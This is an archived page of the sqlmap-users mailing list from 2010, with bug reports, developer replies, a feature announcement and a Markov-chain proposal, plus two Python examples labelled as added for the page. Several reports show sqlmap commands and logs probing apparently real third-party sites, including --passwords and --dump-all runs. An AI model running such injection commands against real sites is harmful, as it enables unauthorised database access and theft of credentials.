sqlmap-users Mailing List for sqlmap (Page 116)
From: David G. <sk...@gm...> - 2010-12-01 19:36:10
Is there any way to make sqlmap not conduct further tests on the site? (stacked, error, time-based, etc.). The problem is that during the identification of types of sqli allowed, it hangs on a test and terminates the program without allowing me to exploit the flaw.

Example:

Revision: 2468

$ ./sqlmap.py -u "http://www.vuln.xxx.br/path/vulnphp.php?vulnparam=1766" -p vulnparam --threads 20 --dbs -v 2

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 17:23:43

[17:23:43] [DEBUG] cleaning up configuration parameters
[17:23:43] [DEBUG] setting the HTTP timeout
[17:23:43] [DEBUG] setting the HTTP method to GET
[17:23:43] [DEBUG] setting the UNION query SQL injection range of columns
[17:23:43] [DEBUG] creating HTTP requests opener object
[17:23:43] [INFO] using '/home/xxx/sqlmap-dev/output/www.vuln.xxx.br/session' as session file
[17:23:43] [INFO] testing connection to the target url
[17:23:44] [WARNING] the testable parameter 'vulnparam' you provided is not into the Cookie
[17:23:44] [INFO] testing if the url is stable, wait a few seconds
[17:23:46] [INFO] url is stable
[17:23:49] [INFO] heuristics shows that GET parameter 'vulnparam' might be injectable (possible DBMS: MySQL)
[17:23:49] [INFO] testing sql injection on GET parameter 'vulnparam'
[17:23:49] [INFO] testing 'AND boolean-based blind - WHERE clause'
sqlmap got a 302 redirect to /home/l.php - What target address do you want to use from now on? http://www.vuln.xxx.br:80/path/vulnphp.php (default) or provide another target address based also on the redirection got from the application >
[17:23:52] [DEBUG] setting match ratio for current parameter to default value 0.900
[17:23:58] [INFO] GET parameter 'vulnparam' is 'AND boolean-based blind - WHERE clause' injectable
[17:23:58] [DEBUG] skipping test 'OR boolean-based blind - WHERE clause' because the risk is higher than the provided
[17:23:58] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY clause' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY clause' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:23:58] [INFO] testing 'MySQL >= 5.0 error-based - WHERE clause'
[17:23:59] [INFO] GET parameter 'vulnparam' is 'MySQL >= 5.0 error-based - WHERE clause' injectable
[17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - WHERE clause' because the back-end DBMS identified is MySQL
[17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - WHERE clause' because the back-end DBMS identified is MySQL
[17:24:00] [DEBUG] skipping test 'Oracle error-based - WHERE clause' because the back-end DBMS identified is MySQL
[17:24:00] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Oracle error-based - ORDER BY clause' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Oracle error-based - ORDER BY clause' because the level is higher than the provided
[17:24:00] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:24:00] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the back-end DBMS identified is MySQL
[17:24:00] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries - exists function' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries - Glibc' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries' because the back-end DBMS identified is MySQL
[17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'SQLite > 2.0 stacked queries' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Firebird stacked queries' because the level is higher than the provided
[17:24:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:24:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[17:25:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[17:25:42] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[17:26:13] [CRITICAL] unable to connect to the target url or proxy

[*] shutting down at: 17:26:13

David
From: Miroslav S. <mir...@gm...> - 2010-11-30 18:13:52
Hi Jorge.

You are using a quite outdated version of sqlmap. Please update to our latest development version (0.9/dev) from our repository to have it fixed:

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

Kind regards.

On Mon, Nov 29, 2010 at 5:15 PM, Jorge Moya A. <jor...@sy...> wrote:
> [13:13:30] [INFO] updating sqlmap
> [13:13:32] [ERROR] unhandled exception in sqlmap/0.6.4, please copy the command line and the following text and send by e-mail to sql...@li.... The developers will fix it as soon as possible:
> sqlmap version: 0.6.4
> Python version: 2.6.6
> Operating system: linux2
> Traceback (most recent call last):
>   File "/usr/bin/sqlmap", line 78, in main
>     init(cmdLineOptions)
>   File "/usr/share/sqlmap/lib/core/option.py", line 770, in init
>     update()
>   File "/usr/share/sqlmap/lib/core/update.py", line 349, in update
>     __updateSqlmap()
>   File "/usr/share/sqlmap/lib/core/update.py", line 246, in __updateSqlmap
>     logger.errMsg(errMsg)
> AttributeError: Logger instance has no attribute 'errMsg'
>
> [*] shutting down at: 13:13:32
>
> ------------------------------------------------------------------------------
> Increase Visibility of Your 3D Game App & Earn a Chance To Win $500!
> Tap into the largest installed PC base & get more eyes on your game by
> optimizing for Intel(R) Graphics Technology. Get started today with the
> Intel(R) Software Partner Program. Five $500 cash prizes are up for grabs.
> http://p.sf.net/sfu/intelisp-dev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Jorge M. A. <jor...@sy...> - 2010-11-29 16:32:02
[13:13:30] [INFO] updating sqlmap
[13:13:32] [ERROR] unhandled exception in sqlmap/0.6.4, please copy the command line and the following text and send by e-mail to sql...@li.... The developers will fix it as soon as possible:
sqlmap version: 0.6.4
Python version: 2.6.6
Operating system: linux2
Traceback (most recent call last):
  File "/usr/bin/sqlmap", line 78, in main
    init(cmdLineOptions)
  File "/usr/share/sqlmap/lib/core/option.py", line 770, in init
    update()
  File "/usr/share/sqlmap/lib/core/update.py", line 349, in update
    __updateSqlmap()
  File "/usr/share/sqlmap/lib/core/update.py", line 246, in __updateSqlmap
    logger.errMsg(errMsg)
AttributeError: Logger instance has no attribute 'errMsg'

[*] shutting down at: 13:13:32
From: Bernardo D. A. G. <ber...@gm...> - 2010-11-29 09:55:18
Can you please svn update and retry? Please, let us know if the problem persists.

Thank you,
Bernardo

On 29 November 2010 06:53, <nig...@em...> wrote:
> C:\pentest\sqlmap.0.9>sqlmap -u "http://www.website.com/cikk.php?ID_cikk=11" --current-user --current-db --is-dba --dbs --users --passwords --privileges
> [07:42:30] [INFO] testing connection to the target url
> [07:42:32] [INFO] testing if the url is stable, wait a few seconds
> [07:42:35] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
> how do you want to proceed? [C(ontinue)/s(tring)/r(egex)/q(uit)] C
> [07:42:45] [INFO] searching for dynamic content
> [07:42:46] [INFO] dynamic content marked for removal (8 regions)
> [07:42:48] [INFO] testing if GET parameter 'ID_cikk' is dynamic
>
> [07:42:48] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 0.9-dev
> Python version: 2.6.5
> Operating system: nt
> Traceback (most recent call last):
>   File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main
>     start()
>   File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 335, in start
>     elif not checkDynParam(place, parameter, value):
>   File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 354, in checkDynParam
>     payload = agent.payload(place, parameter, value, getUnicode(randInt))
>   File "C:\pentest\sqlmap.0.9\lib\core\agent.py", line 75, in payload
>     retValue = kb.injection.parameter.replace(kb.injection.parameter,
> AttributeError: 'NoneType' object has no attribute 'replace'
>
> [*] shutting down at: 07:42:48

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: <nig...@em...> - 2010-11-29 06:53:18
C:\pentest\sqlmap.0.9>sqlmap -u "http://www.website.com/cikk.php?ID_cikk=11" --current-user --current-db --is-dba --dbs --users --passwords --privileges
[07:42:30] [INFO] testing connection to the target url
[07:42:32] [INFO] testing if the url is stable, wait a few seconds
[07:42:35] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [C(ontinue)/s(tring)/r(egex)/q(uit)] C
[07:42:45] [INFO] searching for dynamic content
[07:42:46] [INFO] dynamic content marked for removal (8 regions)
[07:42:48] [INFO] testing if GET parameter 'ID_cikk' is dynamic

[07:42:48] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9-dev
Python version: 2.6.5
Operating system: nt
Traceback (most recent call last):
  File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main
    start()
  File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 335, in start
    elif not checkDynParam(place, parameter, value):
  File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 354, in checkDynParam
    payload = agent.payload(place, parameter, value, getUnicode(randInt))
  File "C:\pentest\sqlmap.0.9\lib\core\agent.py", line 75, in payload
    retValue = kb.injection.parameter.replace(kb.injection.parameter,
AttributeError: 'NoneType' object has no attribute 'replace'

[*] shutting down at: 07:42:48
From: Carlos G. V. <car...@gm...> - 2010-11-26 18:50:20
Thanks!

Well, as always, I will be using sqlmap with the new options, and will be reporting anything that can help. I'm working on a "progressive use" of N-Markov chains with M-memory. I'm using it for other purposes, but if I see that it can help, I will post it to the list, at least in a theoretical way.

KR

P.S.: You really think that I have Python skills?!?! You must be kidding... ;)

2010/11/19 Miroslav Stampar <mir...@gm...>:
> hi Carlos once again.
>
> as said, i've read your code, and can say that it's a cool thingy.
> but, as said, --predict-output already makes the job really good.
>
> nevertheless, i'll have this one on my mind and incorporate it if
> it'll be helpful in some other situation.
>
> kr
>
> p.s. good python skills ;)
>
> On Wed, Nov 17, 2010 at 4:34 PM, Miroslav Stampar <mir...@gm...> wrote:
>> hi.
>>
>> i'll join Bernardo and say that --predict-output should do the same
>> job. nevertheless will research your code and report.
>>
>> kr
>>
>> On Wed, Nov 17, 2010 at 4:14 PM, Bernardo Damele A. G. <ber...@gm...> wrote:
>>> You spoiled one of the shiny features of sqlmap 0.9-dev that we will
>>> be talking about during the next weeks ;)
>>> It has been implemented since about 5 months ago or so, give it a try
>>> yourself with --predict-output and enjoy.
>>>
>>> Bernardo
>>>
>>> On 17 November 2010 14:57, Carlos Gabriel Vergara <car...@gm...> wrote:
>>>> Hi to all.
>>>>
>>>> Before all, I want to mention that I have been working with the repository
>>>> version of sqlmap (0.9) and it's awesome.
>>>>
>>>> I want to propose something crazy: Markov chains.
>>>> (http://en.wikipedia.org/wiki/Markov_chain)
>>>> Keeping it simple: a Markov chain is a tool that works on predictive
>>>> events. It works with events, generating a "chain" (a list) of which
>>>> event is going to happen if certain events have already happened.
>>>> When using sqlmap, let's say, when enumerating users, if in the middle
>>>> of the process we see that the user is "roo", it's obvious that the
>>>> last char will be a "t". If a table name is "aucti", the rest will be
>>>> "on". If we see the "events" of the Markov chain as the probability of
>>>> finding one char knowing the predecessor chars, it could be used in
>>>> sqlmap, at least to "try" the most frequent char for the previous
>>>> combination, based on a dictionary of words (common users, tables,
>>>> structures, values, etc).
>>>> Another capability of Markov chains is that they have "memory"; in case of
>>>> char prediction, the memory specifies how many chars it will be
>>>> "looking back" when predicting the next.
>>>>
>>>> I have coded a sample in Python that shows the process in a very foolish
>>>> example. It's a tool that takes a dictionary as input, a "memory size"
>>>> (default 2 chars back), and generates a random text based on this
>>>> chain. The result will be random text similar to the language used in
>>>> the dictionary.
>>>>
>>>> In sqlmap, the chain could be used to test the next "more probable"
>>>> character for the partially guessed string based on a dictionary of
>>>> common words.
>>>>
>>>> For example: the script was used on a dict file generated using
>>>> "sqlmap --help > testdict.txt", with this output:
>>>>
>>>> $ ./markov_chain.py -d testdict.txt -m 4
>>>> sqlmap/0.8 - authe cookie header --ver takeover own SQL injection
>>>> INI file click processions can behaviour or stack-end DBMS database
>>>> gentry key value=RFILE -c CONFIGFILE Write DBMS current
>>>> Last from retrinter(s) ratingerpreteration cert=ACERT First or
>>>> structure affection (defaults (default 1)
>>>>
>>>> Look how the "randomly" generated text using the chain is very very
>>>> similar to English.
>>>>
>>>> I'm attaching the source to the mail.
>>>>
>>>> Hope it can help!
>>>>
>>>> Best regards,
>>>>
>>>> --
>>>> --------8<--------
>>>> Carlos Gabriel Vergara
>>>> http://www.ThorSecurity.com.ar
>>>>
>>>> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
>>>> -------->8--------
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Beautiful is writing same markup. Internet Explorer 9 supports
>>>> standards for HTML5, CSS3, SVG 1.1, ECMAScript5, and DOM L2 & L3.
>>>> Spend less time writing and rewriting code and more time creating great
>>>> experiences on the web. Be a part of the beta today
>>>> http://p.sf.net/sfu/msIE9-sfdev2dev
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>> --
>>> Bernardo Damele A. G.
>>> E-mail / Jabber: bernardo.damele (at) gmail.com
>>> Mobile: +447788962949 (UK 07788962949)
>>> PGP Key ID: 0x05F5A30F
>>
>> --
>> Miroslav Stampar
>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>> Mobile: +385921010204 (HR 0921010204)
>> PGP Key ID: 0xB5397B1B
>> Location: Zagreb, Croatia
>
> --
> Miroslav Stampar
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia

--
--------8<--------
Carlos Gabriel Vergara
http://www.ThorSecurity.com.ar
PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
-------->8--------
From: Bernardo D. A. G. <ber...@gm...> - 2010-11-24 15:12:22
Hi,

As we announced last week, let's kick off with the posts about sqlmap's shiny new features that will culminate with the release of version 0.9 in early 2011!

Feature: direct connection to a database management system
Switch involved: -d
Generic syntax: DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
Sample syntax: python sqlmap.py -d mysql://root:testpass@192.168.136.131:3306/mysql -v 2

This feature has been around since May or so; I even presented it during my speech at AthCon[1] back in June.

So far sqlmap has been yet another SQL injection tool, used by web application penetration testers/newbies/curious teens/computer addicts/punks and so on. Things move on and as they evolve, we do as well. Now it supports this new switch, -d, that allows you to connect from your machine to the database server's TCP port where the DBMS instance is listening, given valid credentials, IP address, TCP port and database name.

All in all, now it can also be handy at first sight during infrastructure assessments: you can use sqlmap to attack database servers either by leveraging SQL injection vulnerabilities in web applications or by connecting directly to the database given valid credentials. All of the fingerprint, enumeration and takeover functionalities stand and work in both scenarios. If they don't, there's a bug and you're gently encouraged to report it.

It relies on Python bindings for the MySQL protocol, PostgreSQL protocol and so on, and the code has been implemented in the plugins/dbms/*/connector.py files. Other modifications have been applied here and there in the lib/ subfolders to make the switch work too.

Let's make an example:

--8<--
$ python sqlmap.py -d mysql://root:testpass@192.168.136.131:3306/mysql -v 2 --dbs

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 15:11:38

[15:11:38] [DEBUG] cleaning up configuration parameters
[15:11:38] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/192.168.136.131/session' as session file
[15:11:38] [DEBUG] forcing timeout to 10 seconds
[15:11:38] [INFO] connection to mysql server 192.168.136.131:3306 established
[15:11:38] [INFO] testing MySQL
[15:11:38] [DEBUG] query: SELECT CONNECTION_ID()=CONNECTION_ID()
[15:11:38] [INFO] confirming MySQL
[15:11:38] [DEBUG] query: SELECT ISNULL(1/0)
[15:11:38] [DEBUG] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
[15:11:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[15:11:38] [INFO] fetching database names
[15:11:38] [DEBUG] query: SELECT schema_name FROM information_schema.SCHEMATA ORDER BY 1
available databases [3]:
[*] mysql
[*] testdb
[*] information_schema

[15:11:38] [INFO] connection to mysql server 192.168.136.131:3306 closed

[*] shutting down at: 15:11:38
--8<--

And another one:

--8<--
$ python sqlmap.py -d oracle://SYS:testpass@192.168.136.131:1521/testdb -v 1 --users

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 15:06:08

[15:06:08] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/192.168.136.131/session' as session file
[15:06:08] [INFO] successfully connected as SYSDBA
[15:06:08] [INFO] connection to oracle server 192.168.136.131:1521 established
[15:06:08] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[15:06:08] [INFO] fetching database users
database management system users [21]:
[*] MDDATA
[*] MGMT_VIEW
[*] ANONYMOUS
[*] DIP
[*] SYS
[*] SI_INFORMTN_SCHEMA
[*] CTXSYS
[*] OUTLN
[*] TSMSYS
[*] DBSNMP
[*] WMSYS
[*] SYSMAN
[*] OLAPSYS
[*] XDB
[*] EXFSYS
[*] ORDPLUGINS
[*] DMSYS
[*] SCOTT
[*] MDSYS
[*] SYSTEM
[*] ORDSYS

[15:06:09] [INFO] connection to oracle server 192.168.136.131:1521 closed

[*] shutting down at: 15:06:09
--8<--

[1] http://bernardodamele.blogspot.com/2010/06/got-database-access-own-network.html

Cheers,

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
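The -d switch takes the DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME string described above. As an added example (not sqlmap's own parsing code), here is a validating parser for that syntax, with a redaction helper so the password never reaches a log line; the accepted DBMS names, the default ports used when the port is omitted, and the DSNError type are assumptions made for this example.

```python
"""Parser for the connection-string syntax sqlmap's -d switch accepts:
    DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
Added example, not sqlmap's own code; DBMS names and default ports are assumed."""
import re
from dataclasses import dataclass

# Assumed default TCP ports, used only when the string omits DBMS_PORT.
DEFAULT_PORTS = {"mysql": 3306, "postgresql": 5432, "mssql": 1433, "oracle": 1521}


class DSNError(ValueError):
    """Raised for a malformed or unsupported connection string."""


@dataclass(frozen=True)
class DirectConnection:
    dbms: str
    user: str
    password: str
    host: str
    port: int
    database: str


# USER may not contain ':' '@' '/', PASSWORD may be empty but not contain '@' '/',
# the port is optional, DATABASE_NAME runs to the end of the string.
_DSN_RE = re.compile(
    r"^(?P<dbms>[A-Za-z]+)://"
    r"(?P<user>[^:@/]+):(?P<password>[^@/]*)@"
    r"(?P<host>[^:/@]+)(?::(?P<port>\d{1,5}))?"
    r"/(?P<database>[^/?#]+)$"
)


def parse_dsn(dsn: str) -> DirectConnection:
    """Split the -d string into its parts, applying the assumed default port."""
    m = _DSN_RE.match(dsn.strip())
    if not m:
        raise DSNError(f"malformed connection string: {dsn!r}")
    dbms = m["dbms"].lower()
    if dbms not in DEFAULT_PORTS:
        raise DSNError(f"unsupported DBMS {dbms!r}")
    port = int(m["port"]) if m["port"] else DEFAULT_PORTS[dbms]
    if not 1 <= port <= 65535:
        raise DSNError(f"port out of range: {port}")
    return DirectConnection(dbms, m["user"], m["password"], m["host"], port, m["database"])


def is_valid_dsn(dsn: str) -> bool:
    """True when parse_dsn() accepts the string."""
    try:
        parse_dsn(dsn)
        return True
    except DSNError:
        return False


def redact(dsn: str) -> str:
    """Re-serialise the DSN with the password masked, for safe logging."""
    c = parse_dsn(dsn)
    return f"{c.dbms}://{c.user}:***@{c.host}:{c.port}/{c.database}"


if __name__ == "__main__":
    # The two sample strings from the announcement above.
    for s in ("mysql://root:testpass@192.168.136.131:3306/mysql",
              "oracle://SYS:testpass@192.168.136.131:1521/testdb"):
        print(parse_dsn(s), "->", redact(s))
```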
From: Miroslav S. <mir...@gm...> - 2010-11-19 22:00:30
hi Carlos once again.

as said, i've read your code, and can say that it's a cool thingy. but, as said, --predict-output already makes the job really good.

nevertheless, i'll have this one on my mind and incorporate it if it'll be helpful in some other situation.

kr

p.s. good python skills ;)

On Wed, Nov 17, 2010 at 4:34 PM, Miroslav Stampar <mir...@gm...> wrote:
> hi.
>
> i'll join Bernardo and say that --predict-output should do the same
> job. nevertheless will research your code and report.
>
> kr
>
> On Wed, Nov 17, 2010 at 4:14 PM, Bernardo Damele A. G. <ber...@gm...> wrote:
>> You spoiled one of the shiny features of sqlmap 0.9-dev that we will
>> be talking about during the next weeks ;)
>> It has been implemented since about 5 months ago or so, give it a try
>> yourself with --predict-output and enjoy.
>>
>> Bernardo
>>
>> On 17 November 2010 14:57, Carlos Gabriel Vergara <car...@gm...> wrote:
>>> Hi to all.
>>>
>>> Before all, I want to mention that I have been working with the repository
>>> version of sqlmap (0.9) and it's awesome.
>>>
>>> I want to propose something crazy: Markov chains.
>>> (http://en.wikipedia.org/wiki/Markov_chain)
>>> Keeping it simple: a Markov chain is a tool that works on predictive
>>> events. It works with events, generating a "chain" (a list) of which
>>> event is going to happen if certain events have already happened.
>>> When using sqlmap, let's say, when enumerating users, if in the middle
>>> of the process we see that the user is "roo", it's obvious that the
>>> last char will be a "t". If a table name is "aucti", the rest will be
>>> "on". If we see the "events" of the Markov chain as the probability of
>>> finding one char knowing the predecessor chars, it could be used in
>>> sqlmap, at least to "try" the most frequent char for the previous
>>> combination, based on a dictionary of words (common users, tables,
>>> structures, values, etc).
>>> Another capability of Markov chains is that they have "memory"; in case of
>>> char prediction, the memory specifies how many chars it will be
>>> "looking back" when predicting the next.
>>>
>>> I have coded a sample in Python that shows the process in a very foolish
>>> example. It's a tool that takes a dictionary as input, a "memory size"
>>> (default 2 chars back), and generates a random text based on this
>>> chain. The result will be random text similar to the language used in
>>> the dictionary.
>>>
>>> In sqlmap, the chain could be used to test the next "more probable"
>>> character for the partially guessed string based on a dictionary of
>>> common words.
>>>
>>> For example: the script was used on a dict file generated using
>>> "sqlmap --help > testdict.txt", with this output:
>>>
>>> $ ./markov_chain.py -d testdict.txt -m 4
>>> sqlmap/0.8 - authe cookie header --ver takeover own SQL injection
>>> INI file click processions can behaviour or stack-end DBMS database
>>> gentry key value=RFILE -c CONFIGFILE Write DBMS current
>>> Last from retrinter(s) ratingerpreteration cert=ACERT First or
>>> structure affection (defaults (default 1)
>>>
>>> Look how the "randomly" generated text using the chain is very very
>>> similar to English.
>>>
>>> I'm attaching the source to the mail.
>>>
>>> Hope it can help!
>>>
>>> Best regards,
>>>
>>> --
>>> --------8<--------
>>> Carlos Gabriel Vergara
>>> http://www.ThorSecurity.com.ar
>>>
>>> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
>>> -------->8--------
>>
>> --
>> Bernardo Damele A. G.
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>> PGP Key ID: 0x05F5A30F
>
> --
> Miroslav Stampar
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
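The Markov-chain idea quoted in this thread (and in Carlos's own reply above) is a character-level chain with an M-character memory built from a word list, which suggests the next most probable character for a partial string such as "roo" or "aucti". Here it is as an added example written for this page; it is neither the markov_chain.py script attached to the original mail nor sqlmap's --predict-output, and the word list is constructed.

```python
"""Character-level Markov chain with M-character memory, trained on a word list.
Added example for the proposal quoted above; not the attached script and not
sqlmap's --predict-output. WORDS is a constructed dictionary."""
from collections import Counter, defaultdict

START, END = "^", "$"   # padding marker and end-of-word marker


class CharMarkov:
    def __init__(self, words, memory=2):
        if memory < 1:
            raise ValueError("memory must be at least 1")
        self.memory = memory
        # context (last `memory` chars) -> Counter of the character that followed it
        self.transitions = defaultdict(Counter)
        for w in words:
            self._add(w.lower())

    def _add(self, word):
        padded = START * self.memory + word + END
        for i in range(self.memory, len(padded)):
            ctx = padded[i - self.memory:i]
            self.transitions[ctx][padded[i]] += 1

    def _context(self, prefix):
        # Left-pad so that prefixes shorter than the memory still have a context.
        padded = START * self.memory + prefix.lower()
        return padded[-self.memory:]

    def candidates(self, prefix):
        """Possible next characters for prefix, most frequent first, with probabilities."""
        counts = self.transitions.get(self._context(prefix))
        if not counts:
            return []
        total = sum(counts.values())
        return [(ch, n / total) for ch, n in counts.most_common()]

    def predict(self, prefix):
        """Most probable next character, or None if the context was never seen."""
        c = self.candidates(prefix)
        return c[0][0] if c else None

    def complete(self, prefix, max_len=32):
        """Greedily extend prefix with the most probable character until END or an
        unknown context; returns the prefix unchanged if nothing can be predicted."""
        out = prefix
        while len(out) < max_len:
            ch = self.predict(out)
            if ch is None or ch == END:
                break
            out += ch
        return out


# Constructed word list standing in for a dictionary of common names.
WORDS = ["root", "roots", "auction", "auctions", "admin", "administrator",
         "user", "users", "mysql", "information_schema"]

if __name__ == "__main__":
    model = CharMarkov(WORDS, memory=2)
    for p in ("roo", "aucti", "admi", "zzz"):
        print(p, "->", model.candidates(p), "| completion:", model.complete(p))
```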
From: Miroslav S. <mir...@gm...> - 2010-11-19 21:44:48
|
hi. could you please be so kind, update to the latest development version and try it again? there was a problem with sqlmap's google searching part reported 6 hours ago by one another user (ToR), caused by a new regular expression used, but i hope that it should be solved in the latest commit. nevertheless, all of you which'll spot any problems with parsing of google results, please report the "dork" used and i'll try to act accordingly. kr On Fri, Nov 19, 2010 at 9:57 PM, Jair Sandoval C. < esa...@se...> wrote: > Hi there. > The coomand used, is: > sqlmap# ./sqlmap.py --dump-all -g "site:congreso.seguridad.unam.mx" > > and the output: > sqlmap version: 0.9-dev > Python version: 2.6.2 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 82, in main > start() > File "/usr/bin/samurai/sqlmap/lib/controller/controller.py", line 226, in > start > injType = checkSqlInjection(place, parameter, value, parenthesis) > File "/usr/bin/samurai/sqlmap/lib/controller/checks.py", line 75, in > checkSqlInjection > trueResult = Request.queryPage(payload, place) > File "/usr/bin/samurai/sqlmap/lib/request/connect.py", line 338, in > queryPage > page, headers = Connect.getPage(url=uri, get=get, post=post, > cookie=cookie, ua=ua, silent=silent, method=method, auxHeaders=auxHeaders, > response=response, raise404=raise404) > File "/usr/bin/samurai/sqlmap/lib/request/connect.py", line 164, in > getPage > conn = urllib2.urlopen(req) > File "/usr/lib/python2.6/urllib2.py", line 124, in urlopen > return _opener.open(url, data, timeout) > File "/usr/lib/python2.6/urllib2.py", line 375, in open > protocol = req.get_type() > File "/usr/lib/python2.6/urllib2.py", line 241, in get_type > raise ValueError, "unknown url type: %s" % self.__original > ValueError: unknown url type: > default?appex=Zamboni&idioma=es&nomex=Diego%20AND%204155=4155 > > > I wished could be helpful. Bye. 
>
> --
